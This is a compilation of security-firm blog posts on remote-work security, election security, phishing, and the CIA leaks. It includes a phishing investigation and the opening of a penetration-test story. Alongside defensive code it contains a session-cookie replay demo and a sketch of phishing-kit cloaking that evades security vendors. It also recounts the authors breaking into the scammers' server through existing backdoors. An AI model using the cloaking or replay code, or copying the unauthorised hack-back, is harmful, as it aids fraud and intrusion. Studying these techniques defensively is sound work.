Protecting Your Business From Your Remote Workforce

A significant portion of your workforce is moving to full- or part-time remote work as a result of COVID-19. As you modify your business processes and workflows to accommodate this change, it’s important to understand how remote work affects your cybersecurity posture and what openings it creates for cybercriminals. We would like to take this opportunity to provide advice on orienting your security posture to account for this expanded attack surface and to illustrate several common patterns of weakness.

VPNs

Long touted as the safest and most reliable way to enable remote work, Virtual Private Networks (VPNs) allow a user to access internal enterprise resources and applications from any internet connection. VPN connections are encrypted, preventing untrusted network operators (such as your local coffee shop) from snooping on sensitive traffic, but they don’t solve every security problem.

Risks:

  • VPNs weaken the network boundary by allowing additional devices into the most vulnerable part of a company’s IT infrastructure – its internal network
  • Compromised user accounts can give attackers direct access to many internal resources
  • Granting VPN access to untrusted devices is equivalent to plugging that device directly into your network, along with any infections it might have

The more users who connect to your VPN, the more likely it is that you are giving an attacker access to your internal network by way of a compromised user device. When VPN access is allowed from non-corporate-provisioned machines, this risk is even greater. If an attacker does gain this access, the results can be devastating, because the internal network is frequently the most vulnerable part of an enterprise.

Solutions:

  • Create a separate User Account specifically for VPN access for each user
  • Place VPN user accounts into a restricted Organizational Unit with as few privileges as possible. For example, if you run Citrix, only allow VPN user accounts to sign onto Citrix desktops.
  • Set up Two-Factor Authentication (2FA) for all users and VPN user accounts to increase difficulty for attackers
  • Install a Honeypot on your internal network to help identify suspicious network activity coming from one remotely connected device
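
The honeypot idea above can be sketched in a few lines. The following is a minimal, illustrative decoy listener, not a production honeypot: it binds to an otherwise unused port and records the source IP of every connection attempt, since any traffic to a port with no real service behind it is suspicious by definition. The port choice is an assumption; in practice you would mimic a service attackers probe for, such as RDP or SSH.

```python
import socket
import threading

def run_honeypot(srv, log, max_conns=1):
    """Accept up to max_conns connections, recording each source IP."""
    for _ in range(max_conns):
        conn, addr = srv.accept()
        log.append(addr[0])  # record the connecting IP for alerting
        conn.close()
    srv.close()

def start_honeypot(host="127.0.0.1", port=0):
    """Start a decoy TCP listener in the background.

    port=0 lets the OS pick a free port for this demo; a real deployment
    would pick a port that mimics a service attackers look for.
    Returns (bound_port, log, thread).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    log = []
    t = threading.Thread(target=run_honeypot, args=(srv, log), daemon=True)
    t.start()
    return srv.getsockname()[1], log, t
```

In a real deployment the `log` list would instead feed your SIEM or alerting pipeline, since a single connection from a VPN-attached device is worth investigating.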

The Vexing VPN: in a split tunnel, security solutions only see traffic destined for the enterprise.

A Note on VPN Configurations:

VPNs can be configured for full or split tunneling. Full tunneling forces all network traffic to travel over the VPN connection, including traffic unrelated to the corporate network, such as YouTube or Skype. In a split-tunnel VPN, only traffic destined for internal corporate services travels over the VPN connection.

A split tunnel is therefore less secure than a full-tunnel configuration, because in a full tunnel your remote users remain protected by your existing network security appliances, such as content filters and next-gen firewalls. This comes with an expensive tradeoff, though: you must have enough bandwidth to serve all of your users’ browsing habits!
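
For concreteness, here is how the distinction typically looks in an OpenVPN server configuration (a sketch only; the internal subnet shown is an assumption about your network):

```text
# Split tunnel: push only the routes for internal corporate subnets,
# so general browsing exits directly from the user's home connection.
push "route 10.0.0.0 255.255.0.0"

# Full tunnel: additionally push a default route so that ALL client
# traffic, corporate or not, traverses the VPN and your appliances.
push "redirect-gateway def1"
```

Other VPN products expose the same choice under different names, so check your vendor’s documentation for the equivalent setting.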

Two Factor Authentication (2FA)

It’s extremely important that you have 2FA deployed within your organization. It helps prevent compromise when user credentials are leaked as part of a breach and makes it more difficult to obtain user credentials through phishing attacks. That said, you should be aware that 2FA is not a silver bullet for protecting user credentials on all services, because 2FA can be bypassed when user devices have been compromised.

Two Factor Hangover

Risks:

  • Compromised devices which are used to prompt the user for a 2FA token may relay the token to an attacker
  • Compromised devices may allow an attacker to steal session information and impersonate affected users

As an example, by stealing or intercepting a session cookie for a service to which the user has already authenticated, an attacker may gain direct access to the application without needing to authenticate. Many applications (e.g., cloud-based email and collaboration tools) do not tie their session cookie to a single device, source IP, or location, because if they did, roaming mobile users would have to reauthenticate every time their device switched from Wi-Fi to a 4G or 5G connection. As a result, it is usually possible for an attacker to reuse the same session as a legitimate user.
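
The session-replay problem can be demonstrated end to end with a toy service. This is a deliberately minimal sketch, not any real application’s behavior: the server authorizes purely on the cookie value, so a second client replaying a captured cookie is indistinguishable from the victim. The cookie value itself is a made-up placeholder.

```python
import http.server
import threading
import urllib.error
import urllib.request

VALID_SESSION = "session=abc123"  # hypothetical token issued after a 2FA login

class App(http.server.BaseHTTPRequestHandler):
    """Toy service that authorizes purely on the session-cookie value.
    Like many real apps, nothing ties the cookie to a device or IP."""
    def do_GET(self):
        ok = self.headers.get("Cookie") == VALID_SESSION
        body = b"welcome" if ok else b"login required"
        self.send_response(200 if ok else 401)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

def fetch(port, cookie=None):
    """Issue a GET, optionally replaying a captured session cookie."""
    req = urllib.request.Request(f"http://127.0.0.1:{port}/")
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
```

Running one `fetch` with the cookie as the "victim" and a second as the "attacker" yields 200 for both, while a request with no cookie gets 401: the service cannot tell the replay apart from the legitimate session.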

Solutions:

  • Monitor your application logs for access from suspicious geographical locations unrelated to your typical user or business locations
  • Do not share sensitive information such as passwords in email or chat
  • Train your employees to report suspicious activity such as disappearing incoming email, email switching from read to unread without explanation, or password reset emails
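
The first solution above, monitoring for geographically anomalous access, reduces to a simple filter once log entries carry a source country. The sketch below assumes a hypothetical log shape of (user, country-code) pairs; in practice the entries would come from your IdP or VPN concentrator, with IPs resolved through a GeoIP database.

```python
# Countries from which your workforce normally signs in (an assumption
# for this example; derive the real set from your own access history).
EXPECTED_COUNTRIES = {"US", "CA"}

def flag_suspicious_logins(entries, expected=EXPECTED_COUNTRIES):
    """Return (user, country) pairs whose source country falls outside
    the expected set, for follow-up by your security team."""
    return [(user, country) for user, country in entries
            if country not in expected]
```

A real implementation would also account for travel and VPN exit nodes before alerting, but even this crude allowlist catches the common case of a stolen session being replayed from an unexpected region.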

Endpoint Security

When your users work from home, they have a greater exposure to cybersecurity threats because inevitably they will be using their devices for both business and pleasure.  This increased usage is even more dangerous when paired with a split-tunnel VPN which does not force browser traffic to flow through enterprise security appliances and controls.

Risks:

  • Antivirus/Antimalware solutions can be bypassed more easily as users are outside of the protections of enterprise networks
  • Traffic visibility may be significantly reduced
  • Users will use their devices for personal browsing/activities which increases their exposure

Since your users will be using their devices more (regardless of whether they are corporate or personal), they will be likely to encounter more threats. This makes patching and antivirus updates critical, but potentially unreliable if those devices do not connect through a VPN or if you allow personal devices on the network.

Solutions:

  • Provide up-to-date devices configured with more aggressive security profiles to high-risk individuals such as Executives and Executive Assistant staff
  • Closely monitor inbound and outbound connections on your remote devices
  • Step up social engineering defense training to help combat COVID-19 related scams
  • Educate your employees not to store or share credentials outside of password-safe solutions such as 1Password, KeePass, LastPass, or Dashlane.

Final Words:

Even when lockdowns and restrictions around the coronavirus are lifted, the volume of remote workers is likely to increase. As we’ve shown, remote users are at increased risk: they sit outside your enterprise security appliances, encounter more threats by using the same devices for both business and pleasure, and aren’t necessarily covered by existing security controls. With this in mind, it’s important to be proactive: set up increased logging, provide updated and secured devices to high-risk individuals within your organization, and limit the access that users have through VPN connections.

We hope that you stay safe, both online and off, and that you keep us in mind if you’re seeking to audit your remote worker security solutions.  In the coming week, we will be providing pricing packages specifically designed around auditing remote work solutions.

The Security Risks Behind Voting Machines & Mail-in Ballots

In recent months, the security of absentee voting, widely used due to the threat of the COVID-19 pandemic, has been called into question. But are these processes any less secure than the electronic voting systems used on a “normal” election day?

Is Mail-In Voting Safe?

Introduction to Electronic Voting System Security

Electronic voting systems come in a number of different forms. At the polls, a voter may experience a few different types of voting systems:

  • Paper Ballots: Paper ballot systems have voters fill out ballots by hand with paper and pens/pencils or hole punches. These ballots may then be scanned in order to rapidly tally votes.
  • Electronic Systems: Purely electronic systems allow voters to vote on a touchscreen computer. In some states, votes are only stored and tallied electronically with no backups.
  • Hybrid Systems: Some systems allow voters to cast votes on a touchscreen, then print a paper ballot for them to verify. This leaves a paper trail of their choices; however, one study indicated that 94% of voters didn’t notice when their votes had been changed.

Known Security Issues of Electronic Voting Systems

Electronic voting machines have a number of different security issues, many of them known for over a decade. The issues with electronic voting and the challenges of fixing them have been demonstrated by a number of different cases, including:

  • Insecure Voting Machines: An assessment of the security of over 100 voting machines at the 2019 DEFCON conference found that all of them contained exploitable vulnerabilities, including weak default passwords, built-in backdoors, etc.
  • Lack of Support for Penetration Testing: Security assessments of voting machines are limited by a lack of manufacturer support, and interpretations of the Computer Fraud and Abuse Act that make such assessments illegal. An amicus brief to the Supreme Court regarding the case advocated for limiting security research to researchers authorized by the company under test, enabling the company to conceal any findings.
  • Use of Outdated Software: A survey of 56 election commissions and Secretaries of State, completed in July and August 2019, found that over half of the voting systems in use ran Windows Server 2008 R2, which reached end-of-life on January 14, 2020.

These issues point to the conclusion that a determined attacker could easily breach US election infrastructure if they chose to do so; the absence of a known breach suggests only that no threat actor has yet made that choice. In fact, Russia is believed to have gained access to voter registration systems in several states in 2016 but chose not to act on that access.

However, this lack of discovered breaches may have resulted from a lack of looking for them. In 2018, Netragard performed an analysis of the Crosscheck system designed to detect voters casting multiple ballots in different jurisdictions. Based upon analysis of public information, several vulnerabilities were discovered, but they could not be followed up on because hacking election infrastructure is illegal.

After hearing of the assessment, a Kansas official claimed that our team “didn’t succeed in hacking it.” Later, another Kansas legislator claimed that a “complete scan” found no evidence of attackers exploiting the vulnerabilities to breach the system. This is despite the fact that no vulnerability scan can detect a breach, and no evidence exists of a digital forensics investigation being performed to identify a potential breach.

At the end of the day, the answer to the question of whether or not a hacker could breach US election infrastructure is “almost certainly”. However, no evidence exists of this occurring, potentially because no conclusive investigation has been performed.

Introduction to Mail-In Ballot Security

In most states, voting via an absentee or mail-in ballot is a two-step process. The first step is submitting an absentee ballot request. If this request is validated, an absentee ballot is sent to the voter’s registered address to be completed and returned via mail or an election dropbox.

The validation steps for absentee ballot requests and ballots vary from state to state. Each state performs at least one (and often several) of the following checks:

  • Envelope Verification: A ballot is only valid if returned in the official envelope. All ballots returned in a different envelope are discarded.
  • Signature Verification: Many states require a signed affidavit by the voter, and, in some states, election officials compare the signatures on the ballot and on a voter’s official registration. Mismatched signatures are the most common method by which voter fraud is detected.
  • Voter Identification: Many states will require a voter to submit some form of identification with their ballot, such as a photocopy of their driver’s license or part of their Social Security Number (SSN).
  • Witness Signature: Some states require the signatures of one or more witnesses or a public notary on a mail-in ballot.

Known Security Issues of Mail-In Ballots

The Heritage Foundation keeps a record of every case of alleged voter fraud that has been reported to date. This database includes a variety of different voting crimes, including fraudulent registrations, misuse of absentee voting, coercion of voters at the polls, and more. To date the Heritage Foundation has recorded 1,298 cases of alleged voter fraud between 1988 and 2020, though some of its claims are unsupported or incorrect.

Of these 1,298 cases, the Heritage Foundation claims that 207 individuals have been involved in 153 distinct cases of voter fraud that involved the use of absentee ballots. Of these cases, 39 (involving 66 individuals) have included a deliberate attempt to change the results of an election. Other cases involve people voting for a recently deceased spouse or relative, a single person voting twice in different jurisdictions, using a previous mailing address on a ballot, mailing in the ballot of a non-relative (which is illegal in many jurisdictions), and other small-scale errors or attempts at fraud.

In general, attempts to change the results of an election via mail-in voter fraud have focused on local elections with a small margin. One of the larger cases of fraud on record (Miguel Hernandez, 2017) involved an individual forging absentee ballot requests and collecting and mailing the ballots after the voters had completed them. This incident included only 700 mail-in votes, and the actual voting was performed by the authorized voters. Even if Hernandez forged the votes, the impact on a US Presidential election would be negligible.

For comparison, over 125 million votes were cast in the 2016 election. According to the Heritage Foundation, there were six attempts at absentee ballot fraud in the 2016 Presidential Election:

  • Audrey Cook voted on behalf of her deceased husband
  • Steven Curtis (head of the Colorado Republican Party) forged his wife’s signature on her ballot
  • Terri Lynn Rote tried to vote twice out of fear that the election was rigged
  • Marjory Gale voted for herself and her daughter, who was away at college
  • Randy Allen Jumper voted twice in two different jurisdictions
  • Bret Warren stole and submitted five absentee ballots; the affected voters reported never receiving their ballots and were allowed to cast provisional ballots

These cases are clear examples of voter fraud in the 2016 election. However, even if they had gone undetected and all the votes had gone the same way, ten votes are unlikely to have any impact on the election. In fact, an election commission was formed to look into claims that 3-5 million fraudulent votes were cast in the 2016 election; it was disbanded with no findings.

Comparing Electronic Voting Systems and Mail-In Ballot Security

At the end of the day, there is no evidence of large-scale election interference or voter fraud using electronic voting machines or mail-in ballots. While six counts of misuse of absentee ballots were detected in the 2016 Presidential election, they comprised a total of ten votes.

If anything, glitches in electronic voting machines should be considered a major threat to election security. In 2019, analysis of the paper record of a “glitchy” voting machine in a local Pennsylvania election revealed that a candidate with only 15 recorded votes had actually won by over 1,000.

While mail-in ballots have their issues (like an overburdened postal system), electronic voting machines are much less secure and reliable. The fact that an unknown number of electronic voting systems are connected to the Internet, making them accessible to hackers and vulnerable to malware, creates a much greater exposure to election meddlers than absentee ballots, which must be physically collected and filled out to be used in fraud.

What Thieves Know About Anti-Phishing Solutions & What This Means To You

Without taking proper precautions, your computer is a veritable smörgåsbord for hackers. Hackers have developed an array of techniques to infiltrate your system, extract your data, install self-serving software, and otherwise wreak havoc on your system. Every network in the world is vulnerable to hacking attempts; it’s simply a matter of which systems the hackers deem worth the effort. Preventing hackers from successfully compromising your data requires an understanding of the various solutions. However, very few of those solutions are truly effective.

The Differences Between Phishing and Spear Phishing

Phishing casts a wide net to hundreds, thousands, or even millions of email addresses. Phishing can be used to steal passwords, perform wide-scale malware deployment (think WannaCry), or even serve as a component of disinformation campaigns (think Russia). More often than not, phishing is carried out by financially motivated criminals. In most cases, phishing breaches are not detected until it is too late, making it nearly impossible to prevent damages.

Spear phishing, as the name implies, is a more targeted version of phishing. Spear phishing campaigns are generally conducted against companies, specific individuals, or small groups of individuals. The primary goal of a spear phishing campaign is to gain entry into a target network. The DNC hack, for example, used spear phishing as the initial method of breach. Once the breach was effected, the hackers began performing Distributed Metastasis (aka pivoting) and secured access to sensitive data.

In nearly all cases, businesses and governments are ill-prepared to defend against phishing attacks. This is in part because the solutions that exist today are largely ineffective. Most commercial phishing platforms provide the same basic level of benefit as automated vulnerability scanners. If you really want to defend against phishing, then you need a solution designed specifically for you and your network.

Real (not commercial) Tactics For Phishing and Spear Phishing

An email will go out, supposedly from a trusted source. In reality, it will come from a chameleon domain set up specifically by the hackers to leverage your trust. A chameleon domain is a domain that appears to be the same as your company’s domain, or a high-profile domain, but isn’t. (These domains are often accompanied by a clone website with a valid SSL certificate.) For example, instead of linkedin.com, the chameleon domain might be 1inkedin.com. The two domains look identical at a glance, but in the second, the “l” of linkedin is exchanged for the number one. Historically, hackers used Internationalized Domain Name (IDN) homograph attacks to create chameleon domains, but that methodology is no longer reliable.

An email might also arrive from a different Top Level Domain (TLD): say, linkedin.co, linkedin.org, or even linkedin.abc. There are many opportunities for deception when it comes to creating a chameleon domain. All of these oppotrunities exist because the human brain will read a word the same way so long as the first and last letters of the word are in the correct place. For example, you will likely fall victim to phishing if you just read the word “opportunities” and didn’t notice that we swapped the places of the letters “T” and “R”. Experienced hackers are masters at exploiting this human tendency. (https://www.mrc-cbu.cam.ac.uk/people/matt.davis/cmabridge/)
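
The 1inkedin.com trick can be caught mechanically by normalizing look-alike characters before comparing domains. The sketch below is illustrative only: the homoglyph table is a tiny assumed subset, not a complete confusables database, and a production filter would also handle IDN/punycode and letter transpositions.

```python
# Minimal chameleon-domain detection. The substitution table is a small,
# assumed sample of common look-alikes.
HOMOGLYPHS = {"1": "l", "0": "o", "rn": "m", "vv": "w"}

def normalize(domain):
    """Collapse common look-alike substitutions to the letters they mimic."""
    d = domain.lower()
    for fake, real in HOMOGLYPHS.items():
        d = d.replace(fake, real)
    return d

def is_chameleon(candidate, trusted):
    """True if candidate is not the trusted domain but reads like it."""
    return (candidate.lower() != trusted.lower()
            and normalize(candidate) == normalize(trusted))
```

Screening the domains of inbound links against a short list of trusted domains this way is cheap, and it flags exactly the class of swap described above.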
When (spear) phishing is combined with malware, it becomes a powerful weapon. A common misconception is that antivirus and antimalware software will protect you from infection. If that were true, then threats like the recent WannaCry (MS17-010) outbreak would never have been a problem. The reality is that antivirus technologies aren’t all that effective at preventing infections. Intrusion Prevention Systems (IPS), likewise, aren’t all that effective at preventing intrusions; if they were, we would not be seeing an ever-increasing number of breached businesses (nearly all of which use some form of IPS or third-party MSSP).

The bad guys may target 3 or 30 people with a spear phishing attack. To succeed with a well-crafted attack, they only need a single victim. That victim usually becomes their entry point into a network, and from there it is only a matter of time until the network is fully compromised. With a normal phishing attack, campaigns with larger numbers of victims are desirable: more victims equates to more captured data.

Businesses Making Money from Anti-Phishing

For some companies, not a week goes by without a phishing attempt landing in their email server. Phishing is a source of consternation for companies everywhere.

Security companies, concerned about the devastation that phishing and spear phishing efforts can inflict, have taken up the mantle of offering phishing education to their clients. They have special programs for mid- and large-size corporations to combat phishing efforts.

Once a company signs up for education, it is common to test the company soon afterward to see what needs to be covered. For instance, a phishing attempt is made against half or all of the company. It will be a typical, run-of-the-mill “attack,” in which users are given a convenient link and encouraged to go there to “make it right” again.

After clicking on the link, the user is taken to a site which informs them that they were phished, how they were phished, and what safety measures can prevent future successful phishing. Information about the success rate of the phishing attempt is also gathered, so the security company has a baseline. From that information, educational materials are given to the company for further training.

A set amount of time later, usually a few months, the security company runs the same type of phishing attempt against the employees of the target company. The success rates are then compared (the second try usually fools fewer people), and the target company receives certification that it is safer from phishing attempts now that it has been educated.

How Effective Are Anti-Phishing Companies?

Employing an anti-phishing security firm can provide a false sense of security for companies that would be vulnerable to phishing attempts. Going through the education reduces the likelihood that a blatant, basic phishing attempt will succeed, but it usually does little to prevent a real-world, targeted attack, especially a spear phishing one.

Anti-phishing companies generally use automated systems to test a company’s phishability. They use the most rudimentary phishing techniques, yet many advertise that their solutions will be more effective than they actually are against real-world phishing attempts. In other words, these anti-phishing companies generally provide a political solution rather than a real solution to the problem of phishing and spear phishing. This is very similar to how vulnerability scanning companies market themselves.

The people who want to break into a company’s systems are patient. They custom-create a strategy to get into your systems rather than sending a blanket email to everyone in the company, which would be too blatant. Their attempts to socially engineer a favorable outcome are most likely going undetected.

The biggest question an anti-phishing company has to ask itself is whether it is providing the level of security that it is promoting. By certifying employees as phish-proof, does that mean those employees are truly savvy enough to detect ANY phishing attempt? Is the security company simply marketing, or is it truly interested in protecting its clients against phishing?

Before going with a company that advertises anti-phishing education, keep in mind that spear phishing is highly customized and most likely won’t come to you as an email from PayPal, LinkedIn, or another popular site. It will most likely come to you from someone you know, possibly within your own company. Ask the vendor what measures they plan to take to help you truly fight the spear phishing attacks aimed at your company.
 

What they are not telling you about the CIA leaks.

The CIA leaks are making huge waves across the world. In a nutshell, the documents claim to reveal some of the hacking capabilities that the CIA has. Many privacy advocates believe that exposure of secrets like these is a net benefit for citizens because it provides transparency in government action. The media also likes leaks like these because they provide excellent story fodder.
But there is one thing that no one is talking about with these leaks, something that has serious long-term consequences for all of our foreign relationships. The concept is called attribution in the intelligence field, and it’s important that everyone understand what it is and why it matters, so they can put the real danger of these leaks into proper context.

What is Attribution?

Attribution is the ability to accurately trace evidence of an action back to whoever performed it. Even if you don’t know the term, these examples will make it quite clear. Let’s say you’re a child on a school playground. You tell your best friend a secret that you don’t want anyone to know. A few days later, the whole school knows. If you know you didn’t tell anyone else, who told the secret? The obvious person to blame is the best friend. That breach of trust could end your friendship.
That’s a simple example. A more complex one is a murder case. Let’s say that your neighbor kills your best friend in your house, but isn’t caught. Instead, you are accused and you spend a lot of money on lawyers to get the charges dismissed. Your reputation is damaged, but you stay out of jail. The case grows cold.
Now, let’s say over time you become close friends with your neighbor. Later, for whatever reason, the neighbor gets his DNA analyzed and there is a match to the old murder. The neighbor might get arrested, but how would you react?
In the first case, the fact that only one other person knew the secret and leaked it allows us to attribute the leak to that person. In the second, a telltale fingerprint that’s impossible to forge creates an attribution that wasn’t there before and provides ironclad evidence that you weren’t involved.

Leaking and Attribution

Put bluntly, the general public and the media are overreacting about how much the CIA might or might not be using the leaked tools to spy on them. A much more serious concern is what every other government in the world is thinking about the information in these leaks. Here’s why.
One of the roles of any government is to protect the interests of the country and its citizens. Countries use intelligence networks, spies, hacking, and other espionage techniques to gather information in advance about what their enemies and their allies might do next. Failing to get that knowledge puts the country at risk of something called information asymmetry. Other countries can get more information about you than you can about them. It’s like they can peek at your hand in a game of poker before the betting round, but you can’t.
The CIA’s role in America’s spy networks is international intelligence. The CIA isn’t going to turn their attention to people inside of the U.S. unless there is an extraordinarily good reason, despite what conspiracy theorists may think. But foreign governments definitely know the CIA will have at least thought about spying on them at some point. However, unless a spy was caught red-handed and confessed they were a CIA operative, it’s hard for a country to accuse us of spying on them in a specific instance. In short, there is no attribution. Just guesses.
What the CIA leaks do is give information to every government who wants to know how we might hack them. It is extremely difficult to attribute a hacking attack to a specific state actor, despite what the media and television might lead you to believe. You might be able to detect the attack and gather forensic evidence about a hacking incident, but until you can get definitive proof that another country knew about that particular exploit at the time of the attack and had the tools necessary to leverage it, you can’t say for certain. The leak now gives other governments details they can use to analyze their old forensic data and see if there is a match, much like the DNA evidence in the earlier example.
In short, now they can prove that we peeked at their poker hands and know how we did it. The how is also crucial not just for attribution, but for how hacks are conducted between governments.

Hidden Exploits

99.9% of all breaches are the result of the exploitation of known vulnerabilities (for which patches exist), many of which have been public for over a year. But those aren’t the vulnerabilities that governments generally want to exploit. They want to target 0-day vulnerabilities with 0-day exploits. A 0-day vulnerability is a bug in software that is unknown to the vendor or the public. A 0-day exploit is software that leverages a 0-day vulnerability, usually to grant its user access to and control over the target. 0-days are the secrets of the geopolitical hacking playground.
Governments want to keep some 0-day exploits as state secrets. The time for a defense to be built against a revealed exploit can be as little as 24 hours. A 0-day exploit can be used for 6 months or even years. That is a lot of time for a government. But governments don’t want to use these too often anyway. Each time a 0-day exploit is used successfully, it leaves behind some form of forensic evidence that could be used later to gain attribution. The first time might be a surprise. The second will reveal similar patterns with the two attacks. The third time runs the risk of getting caught.
The value of these exploits varies and is determined by operational need, how rare the exploit is, how likely it is to be discovered or detected, and so on. Governments can pay as little as tens of thousands of dollars or as much as several million dollars for a single 0-day exploit. Each time a 0-day exploit is used, its lifespan is shortened significantly. In some cases, a 0-day is used only once before it is exposed (burnt); in others, 0-day exploits may last years before they are burnt. One thing is always true: if governments are going to spend millions of dollars on 0-day exploits, they are not likely to use them on low-value targets like everyday civilians or for easily detected mass exploitation. They are far more likely to be used against high-value, well-protected targets where detection of the breach simply isn’t an option.
Because these are not open secrets, when 0-day exploit information is released in a leak it becomes extremely easy to attribute attacks to a state, and the leak diminishes that state’s intelligence capabilities. Furthermore, every other government now has leverage against that state, and could even have grievances. They could feel like the unjustly accused murder suspect. And unlike the suspect, states have options that citizens do not in terms of how they can retaliate, such as levying sanctions or declaring war. Worse, they could even gain the moral high ground, even though they might be doing the same thing, because they managed to keep their intelligence information secret.
Regardless of whether you think leakers and whistleblowers are heroes or traitors, there are consequences for leaking intelligence information to the world. The average American citizen doesn’t know and can’t know what the foreign consequences will be. Before you cheer the next leak, consider what the consequences might be for our country. What does it mean when we lose our intelligence capabilities and our enemies don’t? What does it mean when our enemies and allies know just how, when, and most importantly, who managed to hack them?

EXPOSED: How These Scammers Tried To Use LinkedIn To Steal Our Client’s Passwords

Earlier this morning, one of our more savvy customers received an email from [email protected]. The email contained a “New Message Received” notification allegedly sourced from CEO Tom Morgan. Contained in the email was a link that read, “Click here to sign in and read your messages”. Fortunately, we had already provided this particular customer with training covering Social Engineering and Phishing threats. So, rather than click on the link, they forwarded the email to Netragard’s Special Project Team, which is like throwing meat to the wolves. The actual email is provided below in Figure 1.
Figure 1
The first step in learning about who was behind this threat was to follow the “click here” link. The link was shortened using the URL shortener ow.ly and so we used curl to expand it. While we were hopeful that the URL would deliver some sort of awesome zeroday or malware, it didn’t. Instead it served up a fake LinkedIn page (Figure 2) designed to steal login and password information.
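Expanding a shortened link simply means reading the Location header from the redirect response rather than following it in a browser, which is what inspecting the output of curl -sI amounts to. A minimal Python sketch of that parsing step (the destination URL shown is invented for illustration):

```python
def expand_short_url(raw_headers):
    """Return the Location header value from a raw HTTP redirect response."""
    for line in raw_headers.splitlines():
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            return value.strip()
    return None

# Example redirect response from a URL shortener (destination is invented)
response = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: http://example.com/fake-linkedin-login\r\n"
    "Content-Length: 0\r\n"
)
print(expand_short_url(response))  # http://example.com/fake-linkedin-login
```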
Figure 2
The server hosting the phishing site was located in Lebanon and, of course, was not properly maintained or patched. Quick reconnaissance showed that directory listing was enabled, that the server was running an outdated and very exploitable version of cPanel, and that the server had already been breached by at least four other parties (at least four backdoors were installed). We used one of the backdoors to gain access to the system in the hopes of learning more (Figure 3).
Figure 3
Our team quickly zeroed in on the “linkd.php” file that was used to generate the phishing page shown in Figure 2.   We explored the file looking for information related to where stolen passwords were being kept. Initially we expected to see the passwords logged to a text file but later found that they were being emailed to an external Gmail account. We also looked for anything that might provide us with information about who was being targeted with this attack but didn’t find much on the system.
We were able to identify the victims of the campaign by making hidden modifications to the attackers’ phishing platform. These modifications allowed us to track who submitted their credentials to the phishing site. When studying the submission data it quickly became apparent that the attackers were almost exclusively targeting Luxembourg-based email addresses (.lu TLDs) and were having a disturbingly high degree of success. Given that people often reuse passwords in multiple locations, this campaign significantly increased the level of risk faced by the organizations that employ the victims. More directly, chances are high that those organizations will be breached using the stolen passwords.
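The analysis itself is simple: group the submitted addresses by top-level domain and count them. A sketch of that step, with invented sample addresses:

```python
from collections import Counter

def tld_breakdown(emails):
    """Count submitted email addresses by top-level domain."""
    counts = Counter()
    for address in emails:
        domain = address.rsplit("@", 1)[-1]       # text after the last @
        tld = domain.rsplit(".", 1)[-1].lower()   # text after the last dot
        counts[tld] += 1
    return counts

victims = ["alice@bank.lu", "bob@corp.lu", "carol@example.com"]  # invented
print(tld_breakdown(victims))  # Counter({'lu': 2, 'com': 1})
```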
The LinkedIn campaign was hardly the only campaign being launched from the server. Other campaigns were identified that included, but may not be limited to, DHL, Google, Yahoo and Dropbox. The Dropbox campaign was by far the most technically advanced. It leveraged blacklisting to avoid serving the phishing content to Netcraft, Kaspersky, BitDefender, Fortinet, Google, McAfee, AlienVault, Avira, AVG, ESET, Doctor Web, Panda, Symantec, and more. In addition to the blacklisting it used an external proxy checker to ensure page uptime.
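A sketch of the kind of gatekeeping the Dropbox kit performed, serving the phishing page only to visitors that don’t look like security vendors. The netblocks and user-agent strings below are placeholders, not the kit’s real lists:

```python
from ipaddress import ip_address, ip_network

# Placeholder ranges standing in for security-vendor crawler netblocks
VENDOR_NETBLOCKS = [
    ip_network("198.51.100.0/24"),  # e.g. an AV vendor's URL scanner
    ip_network("203.0.113.0/24"),   # e.g. a reputation-service crawler
]
VENDOR_UA_WORDS = ("netcraft", "kaspersky", "fortinet")

def should_serve_phish(src_ip, user_agent):
    """Decide whether a visitor gets the phishing page or a benign decoy."""
    addr = ip_address(src_ip)
    if any(addr in net for net in VENDOR_NETBLOCKS):
        return False
    if any(word in user_agent.lower() for word in VENDOR_UA_WORDS):
        return False
    return True

print(should_serve_phish("192.0.2.10", "Mozilla/5.0"))    # True  (victim)
print(should_serve_phish("198.51.100.7", "Mozilla/5.0"))  # False (scanner IP)
```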
Finally, we tracked the IP addresses that were connecting to the system’s various backdoors.  Those IP addresses all geolocated to Nigeria and, unfortunately, are dynamic.
Summary
This phishing campaign highlights two specific issues that can both be countered with careful planning.  The first is that employees are easy to phish, especially when they are outside of the office and not protected by spam filters.  This is problematic because employees often reuse the same passwords at work as they do outside of work, so stealing a LinkedIn password often provides attackers with access to other, more sensitive resources, which can quickly result in a damaging breach and access to an organization’s critical assets.   The solution to this issue is reasonably simple.  First, employees should be required to undergo regular training covering various aspects of security, including but not limited to Social Engineering and Phishing.  Second, employers should require employees to use password management tools similar to 1Password.  Using password management tools properly will eliminate password reuse and significantly mitigate the potential damages associated with password theft.
As for our Nigerian friends, they won’t be operating much longer.

How we tricked your HR lady into giving us access to every customer’s credit card number

We recently completed the delivery of a Realistic Threat PCI focused Penetration Test for a large retail company. As is always the case, we don’t share customer identifiable information, so specific details about this engagement have been altered to protect the innocent. For the sake of this article we’ll call the customer Acme Corporation.

When we were first approached by the Acme Corporation we noticed that they seemed well versed with regards to penetration testing. As it turned out, they had been undergoing penetration testing for more than a decade with various different penetration testing vendors. When we asked them how confident they were about their security they told us that they were highly confident and that no vendor (or hacker to their knowledge) had ever breached their corporate domain let alone their Cardholder Data Environment (CDE). We were about to change that with our Realistic Threat Penetration Testing services.

Realistic Threat Penetration Tests have specific characteristics that make them very different from other penetration tests.

The minimum characteristics that must be included for a penetration test to be called Realistic Threat are:

  1. IT/Security Staff must not be aware of the test.
  2. Must include solid reconnaissance.
  3. Must not depend on automated vulnerability scanners.
  4. Must include realistic Social Engineering not just elementary phishing.
  5. Must include the use of undetectable (and non-malicious) malware.
  6. Must be covert so as to enable propagation of compromise.
  7. Must allow legitimate incident response from the customer.

Let’s begin…

As with all engagements Netragard’s team began with reconnaissance. Reconnaissance is the military term for the passive gathering of intelligence about an enemy prior to attacking the enemy. It is what enables our team to construct surgical plans of attack that allow for undetected penetration into targeted networks. During reconnaissance we focus on mapping out all in-scope network connected devices using truly passive techniques and without making direct network connections. We also focus on passive social reconnaissance using everything from Facebook to LinkedIn to Jigsaw.

